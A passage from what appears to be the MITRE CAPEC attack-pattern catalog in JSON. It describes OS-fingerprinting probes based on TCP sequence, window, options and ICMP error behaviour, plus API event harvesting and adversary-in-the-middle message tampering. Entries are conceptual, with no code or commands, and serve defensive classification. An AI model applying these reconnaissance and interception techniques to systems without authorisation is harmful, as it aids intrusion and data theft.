non-standard packet headers requires the use of raw sockets, which is not available on particular operating systems (Microsoft Windows XP SP 2, for example). Raw socket manipulation on Unix/Linux requires root privileges.","A tool capable of sending and receiving packets from a remote system."]}},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 56"},{"External_Reference_ID":"REF-128"},{"External_Reference_ID":"REF-212","Section":"Chapter 8. Remote OS Detection"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description, Related_Attack_Patterns, Resources_Required, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Phases, Description, Description Summary, Related_Weaknesses"}]}},"321":{"ID":"321","Name":"TCP Sequence Number Probe","Abstraction":"Detailed","Status":"Stable","Description":"This OS fingerprinting probe tests the target system\'s assignment of TCP sequence numbers. One common way to test TCP Sequence Number generation is to send a probe packet to an open port on the target and then compare the how the Sequence Number generated by the target relates to the Acknowledgement Number in the probe packet. Different operating systems assign Sequence Numbers differently, so a fingerprint of the operating system can be obtained by categorizing the relationship between the acknowledgement number and sequence number as follows: 1) the Sequence Number generated by the target is Zero, 2) the Sequence Number generated by the target is the same as the acknowledgement number in the probe, 3) the Sequence Number generated by the target is the acknowledgement number plus one, or 4) the Sequence Number is any other non-zero number.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"312"}},"Prerequisites":{"Prerequisite":"The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card."},"Resources_Required":{"Resource":"A tool capable of sending and receiving packets from a remote system."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 55-56"},{"External_Reference_ID":"REF-128"},{"External_Reference_ID":"REF-212","Section":"Chapter 8. Remote OS Detection"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Related_Attack_Patterns, Resources_Required, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description, Description Summary, Related_Weaknesses"}]}},"322":{"ID":"322","Name":"TCP (ISN) Greatest Common Divisor Probe","Abstraction":"Detailed","Status":"Stable","Description":"This OS fingerprinting probe sends a number of TCP SYN packets to an open port of a remote machine. The Initial Sequence Number (ISN) in each of the SYN/ACK response packets is analyzed to determine the smallest number that the target host uses when incrementing sequence numbers. This information can be useful for identifying an operating system because particular operating systems and versions increment sequence numbers using different values. The result of the analysis is then compared against a database of OS behaviors to determine the OS type and/or version.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"312"}},"Prerequisites":{"Prerequisite":"The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card."},"Resources_Required":{"Resource":"A tool capable of sending and receiving packets from a remote system."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 56"},{"External_Reference_ID":"REF-128"},{"External_Reference_ID":"REF-212","Section":"Chapter 8. Remote OS Detection"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Related_Attack_Patterns, Resources_Required, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Related_Weaknesses"}]}},"323":{"ID":"323","Name":"TCP (ISN) Counter Rate Probe","Abstraction":"Detailed","Status":"Stable","Description":"This OS detection probe measures the average rate of initial sequence number increments during a period of time. Sequence numbers are incremented using a time-based algorithm and are susceptible to a timing analysis that can determine the number of increments per unit time. The result of this analysis is then compared against a database of operating systems and versions to determine likely operation system matches.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"312"}},"Prerequisites":{"Prerequisite":"The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card."},"Resources_Required":{"Resource":{"p":["Any type of active probing that involves non-standard packet headers requires the use of raw sockets, which is not available on particular operating systems (Microsoft Windows XP SP 2, for example). Raw socket manipulation on Unix/Linux requires root privileges.","A tool capable of sending and receiving packets from a remote system."]}},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 56"},{"External_Reference_ID":"REF-128"},{"External_Reference_ID":"REF-212","Section":"Chapter 8. Remote OS Detection"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Related_Attack_Patterns, Resources_Required, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Related_Weaknesses"}]}},"324":{"ID":"324","Name":"TCP (ISN) Sequence Predictability Probe","Abstraction":"Detailed","Status":"Stable","Description":"This type of operating system probe attempts to determine an estimate for how predictable the sequence number generation algorithm is for a remote host. Statistical techniques, such as standard deviation, can be used to determine how predictable the sequence number generation is for a system. This result can then be compared to a database of operating system behaviors to determine a likely match for operating system and version.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"312"}},"Prerequisites":{"Prerequisite":"The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card."},"Resources_Required":{"Resource":"A tool capable of sending and receiving packets from a remote system."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 56"},{"External_Reference_ID":"REF-128"},{"External_Reference_ID":"REF-212","Section":"Chapter 8. Remote OS Detection"},{"External_Reference_ID":"REF-130"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Related_Attack_Patterns, Resources_Required, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References, Related_Weaknesses"}]}},"325":{"ID":"325","Name":"TCP Congestion Control Flag (ECN) Probe","Abstraction":"Detailed","Status":"Stable","Description":"This OS fingerprinting probe checks to see if the remote host supports explicit congestion notification (ECN) messaging. ECN messaging was designed to allow routers to notify a remote host when signal congestion problems are occurring. Explicit Congestion Notification messaging is defined by RFC 3168. Different operating systems and versions may or may not implement ECN notifications, or may respond uniquely to particular ECN flag types.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"312"}},"Prerequisites":{"Prerequisite":"The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card."},"Resources_Required":{"Resource":"A tool capable of sending and receiving packets from a remote system."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 56"},{"External_Reference_ID":"REF-128"},{"External_Reference_ID":"REF-212","Section":"Chapter 8. Remote OS Detection"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Related_Attack_Patterns, Resources_Required, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Related_Weaknesses"}]}},"326":{"ID":"326","Name":"TCP Initial Window Size Probe","Abstraction":"Detailed","Status":"Stable","Description":"This OS fingerprinting probe checks the initial TCP Window size. TCP stacks limit the range of sequence numbers allowable within a session to maintain the \\"connected\\" state within TCP protocol logic. The initial window size specifies a range of acceptable sequence numbers that will qualify as a response to an ACK packet within a session. Various operating systems use different Initial window sizes. The initial window size can be sampled by establishing an ordinary TCP connection.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"312"}},"Prerequisites":{"Prerequisite":"The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card."},"Resources_Required":{"Resource":"A tool capable of sending and receiving packets from a remote system."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 56"},{"External_Reference_ID":"REF-128"},{"External_Reference_ID":"REF-212","Section":"Chapter 8. Remote OS Detection"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Related_Attack_Patterns, Resources_Required, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Related_Weaknesses"}]}},"327":{"ID":"327","Name":"TCP Options Probe","Abstraction":"Detailed","Status":"Stable","Description":"This OS fingerprinting probe analyzes the type and order of any TCP header options present within a response segment. Most operating systems use unique ordering and different option sets when options are present. RFC 793 does not specify a required order when options are present, so different implementations use unique ways of ordering or structuring TCP options. TCP options can be generated by ordinary TCP traffic.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"312"}},"Prerequisites":{"Prerequisite":"The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card."},"Resources_Required":{"Resource":"A tool capable of sending and receiving packets from a remote system."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 56"},{"External_Reference_ID":"REF-128"},{"External_Reference_ID":"REF-212","Section":"Chapter 8. Remote OS Detection"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Related_Attack_Patterns, Resources_Required, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Related_Weaknesses"}]}},"328":{"ID":"328","Name":"TCP \'RST\' Flag Checksum Probe","Abstraction":"Detailed","Status":"Stable","Description":"This OS fingerprinting probe performs a checksum on any ASCII data contained within the data portion or a RST packet. Some operating systems will report a human-readable text message in the payload of a \'RST\' (reset) packet when specific types of connection errors occur. RFC 1122 allows text payloads within reset packets but not all operating systems or routers implement this functionality.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"312"}},"Prerequisites":{"Prerequisite":"The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card."},"Resources_Required":{"Resource":"A tool capable of sending and receiving packets from a remote system."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 56"},{"External_Reference_ID":"REF-128"},{"External_Reference_ID":"REF-212","Section":"Chapter 8. Remote OS Detection"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Related_Attack_Patterns, Resources_Required, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Related_Weaknesses"}]}},"329":{"ID":"329","Name":"ICMP Error Message Quoting Probe","Abstraction":"Detailed","Status":"Stable","Description":"An adversary uses a technique to generate an ICMP Error message (Port Unreachable, Destination Unreachable, Redirect, Source Quench, Time Exceeded, Parameter Problem) from a target and then analyze the amount of data returned or \\"Quoted\\" from the originating request that generated the ICMP error message. For this purpose \\"Port Unreachable\\" error messages are often used, as generating them requires the attacker to send a UDP datagram to a closed port on the target. The goal of this analysis to make inferences about the type of operating system or firmware that sent the error message in reply. This is useful for identifying unique characteristics of operating systems because the RFC-1122 expected behavior reads: \\"Every ICMP error message includes the Internet header and at least the first 8 data octets of the datagram that triggered the error; more than 8 octets MAY be sent [...].\\" This contrasts with RFC-792 expected behavior, which limited the quoted text to 64 bits (8 octets). Given the latitude in the specification the resulting RFC-1122 stack implementations often respond with a high degree of variability in the amount of data quoted in the error message because \\"older\\" or \\"legacy\\" stacks may comply with the RFC-792 specification, while other stacks may choose a longer format in accordance with RFC-1122. As a general rule most operating systems or firmware will quote the first 8 bytes of the datagram triggering the error, but some IP stacks will quote more than the first 8 bytes of data.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"312"}},"Prerequisites":{"Prerequisite":"The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card."},"Resources_Required":{"Resource":"A tool capable of sending/receiving UDP datagram packets from a remote system to a closed port and receive an ICMP Error Message Type 3, \\"Port Unreachable.."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 56"},{"External_Reference_ID":"REF-123"},{"External_Reference_ID":"REF-124"},{"External_Reference_ID":"REF-262"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Related_Attack_Patterns, Resources_Required, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Related_Weaknesses"}]}},"330":{"ID":"330","Name":"ICMP Error Message Echoing Integrity Probe","Abstraction":"Detailed","Status":"Stable","Description":"An adversary uses a technique to generate an ICMP Error message (Port Unreachable, Destination Unreachable, Redirect, Source Quench, Time Exceeded, Parameter Problem) from a target and then analyze the integrity of data returned or \\"Quoted\\" from the originating request that generated the error message. For this purpose \\"Port Unreachable\\" error messages are often used, as generating them requires the attacker to send a UDP datagram to a closed port on the target. When replying with an ICMP error message some IP/ICMP stack implementations change aspects of the IP header, change or reverse certain byte orders, reset certain field values to default values which differ between operating system and firmware implementations, and make other changes. Some IP/ICMP stacks are decidedly broken, indicating an idiosyncratic behavior that differs from the RFC specifications, such as the case when miscalculations affect a field value. A tremendous amount of information about the host operating system can be deduced from its \'echoing\' characteristics. Notably, inspection of key protocol header fields, including the echoed header fields of the encapsulating protocol can yield a wealth of data about the host operating system or firmware version.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"312"}},"Prerequisites":{"Prerequisite":"The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card."},"Resources_Required":{"Resource":"A tool capable of sending/receiving UDP datagram packets from a remote system to a closed port and receive an ICMP Error Message Type 3, \\"Port Unreachable.."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 56"},{"External_Reference_ID":"REF-123"},{"External_Reference_ID":"REF-124"},{"External_Reference_ID":"REF-262"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Related_Attack_Patterns, Resources_Required, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Related_Weaknesses"}]}},"331":{"ID":"331","Name":"ICMP IP Total Length Field Probe","Abstraction":"Detailed","Status":"Stable","Description":"An adversary sends a UDP packet to a closed port on the target machine to solicit an IP Header\'s total length field value within the echoed \'Port Unreachable\\" error message. RFC1122 specifies that the Header of the request must be echoed back when an error is sent in response, but some operating systems and firmware alter the integrity of the original header. Non-standard ICMP/IP implementations result in response that are useful for individuating remote operating system or router firmware versions. There are four general response types that can be used to distinguish operating systems apart: 1) the IP total length field may be calculated correctly, 2) an operating system may add 20 or more additional bytes to the length calculation, 3) the operating system may subtract 20 or more bytes from the correct length of the field or 4) the IP total length field is calculated with any other incorrect value. This type of behavior is useful for building a signature-base of operating system responses, particularly when error messages contain other types of information that is useful identifying specific operating system responses.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"312"}},"Prerequisites":{"Prerequisite":"The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card."},"Resources_Required":{"Resource":"A tool capable of sending/receiving UDP datagram packets from a remote system to a closed port and receive an ICMP Error Message Type 3, \\"Port Unreachable.."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 56"},{"External_Reference_ID":"REF-123"},{"External_Reference_ID":"REF-124"},{"External_Reference_ID":"REF-262"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Related_Attack_Patterns, Resources_Required, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description, Description Summary"}]}},"332":{"ID":"332","Name":"ICMP IP \'ID\' Field Error Message Probe","Abstraction":"Detailed","Status":"Stable","Description":"An adversary sends a UDP datagram having an assigned value to its internet identification field (ID) to a closed port on a target to observe the manner in which this bit is echoed back in the ICMP error message. The internet identification field (ID) is typically utilized for reassembling a fragmented packet. RFC791 and RFC815 discusses about IP datagrams, fragmentation and reassembly. Some operating systems or router firmware reverse the bit order of the ID field when echoing the IP Header portion of the original datagram within the ICMP error message. There are three behaviors related to the IP ID field that can be used to distinguish remote operating systems or firmware: 1) it is echoed back identically to the bit order of the ID field in the original IP header, 2) it is echoed back, but the byte order has been reversed, or it contains an incorrect or unexpected value. Different operating systems will respond by setting the IP ID field differently within error messaging. This allows the attacker to construct a fingerprint of specific OS behaviors.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"312"}},"Prerequisites":{"Prerequisite":"The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card."},"Resources_Required":{"Resource":"A tool capable of sending/receiving UDP datagram packets from a remote system to a closed port and receive an ICMP Error Message Type 3, \\"Port Unreachable.."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 56"},{"External_Reference_ID":"REF-123"},{"External_Reference_ID":"REF-124"},{"External_Reference_ID":"REF-262"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Related_Attack_Patterns, Resources_Required, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description, Description Summary"}]}},"383":{"ID":"383","Name":"Harvesting Information via API Event Monitoring","Abstraction":"Detailed","Status":"Draft","Description":"An adversary hosts an event within an application framework and then monitors the data exchanged during the course of the event for the purpose of harvesting any important data leaked during the transactions. One example could be harvesting lists of usernames or userIDs for the purpose of sending spam messages to those users. One example of this type of attack involves the adversary creating an event within the sub-application. Assume the adversary hosts a \\"virtual sale\\" of rare items. As other users enter the event, the attacker records via AiTM (CAPEC-94) proxy the user_ids and usernames of everyone who attends. The adversary would then be able to spam those users within the application using an automated script.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"407"}},"Prerequisites":{"Prerequisite":"The target software is utilizing application framework APIs"},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data","Note":"The adversary is able to gather information to potentially support further nefarious activities."}},"Mitigations":{"Mitigation":"Leverage encryption techniques during information transactions so as to protect them from attack patterns of this kind."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"311"},{"CWE_ID":"319"},{"CWE_ID":"419"},{"CWE_ID":"602"}]},"References":{"Reference":{"External_Reference_ID":"REF-327"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Related_Attack_Patterns, Resources_Required, Solutions_and_Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Description"}],"Previous_Entry_Name":["Harvesting Usernames or UserIDs via Application API Event Monitoring",{"Date":"2018-07-31"}]}},"384":{"ID":"384","Name":"Application API Message Manipulation via Man-in-the-Middle","Abstraction":"Standard","Status":"Draft","Description":"An attacker manipulates either egress or ingress data from a client within an application framework in order to change the content of messages. Performing this attack can allow the attacker to gain unauthorized privileges within the application, or conduct attacks such as phishing, deceptive strategies to spread malware, or traditional web-application attacks. The techniques require use of specialized software that allow the attacker to perform adversary-in-the-middle (CAPEC-94) communications between the web browser and the remote system. Despite the use of AiTH software, the attack is actually directed at the server, as the client is one node in a series of content brokers that pass information along to the application framework. Additionally, it is not true \\"Adversary-in-the-Middle\\" attack at the network layer, but an application-layer attack the root cause of which is the master applications trust in the integrity of code supplied by the client.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"94"}},"Prerequisites":{"Prerequisite":"Targeted software is utilizing application framework APIs"},"Resources_Required":{"Resource":"A software program that allows a user to man-in-the-middle communications between the client and server, such as a man-in-the-middle proxy."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"471"},{"CWE_ID":"345"},{"CWE_ID":"346"},{"CWE_ID":"602"},{"CWE_ID":"311"}]},"References":{"Reference":{"External_Reference_ID":"REF-327"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Description"}]}},"385":{"ID":"385","Name":"Transaction or Event Tampering via Application API Manipulation","Abstraction":"Detailed","Status":"Draft","Description":"An attacker hosts or joins an event or transaction within an application framework in order to change the content of messages or items that are being exchanged. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that look authentic but may contain deceptive links, substitute one item or another, spoof an existing item and conduct a false exchange, or otherwise change the amounts or identity of what is being exchanged. The techniques require use of specialized software that allow the attacker to man-in-the-middle communications between the web browser and the remote system in order to change the content of various application elements. Often, items exchanged in game can be monetized via sales for coin, virtual dollars, etc. The purpose of the attack is for the attack to scam the victim by trapping the data packets involved the exchange and altering the integrity of the transfer process.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"384"}},"Prerequisites":{"Prerequisite":"Targeted software is utilizing application framework APIs"},"Resources_Required":{"Resource":"A software program that allows the use of adversary-in-the-middle communications (CAPEC-94) between the client and server, such as a man-in-the-middle 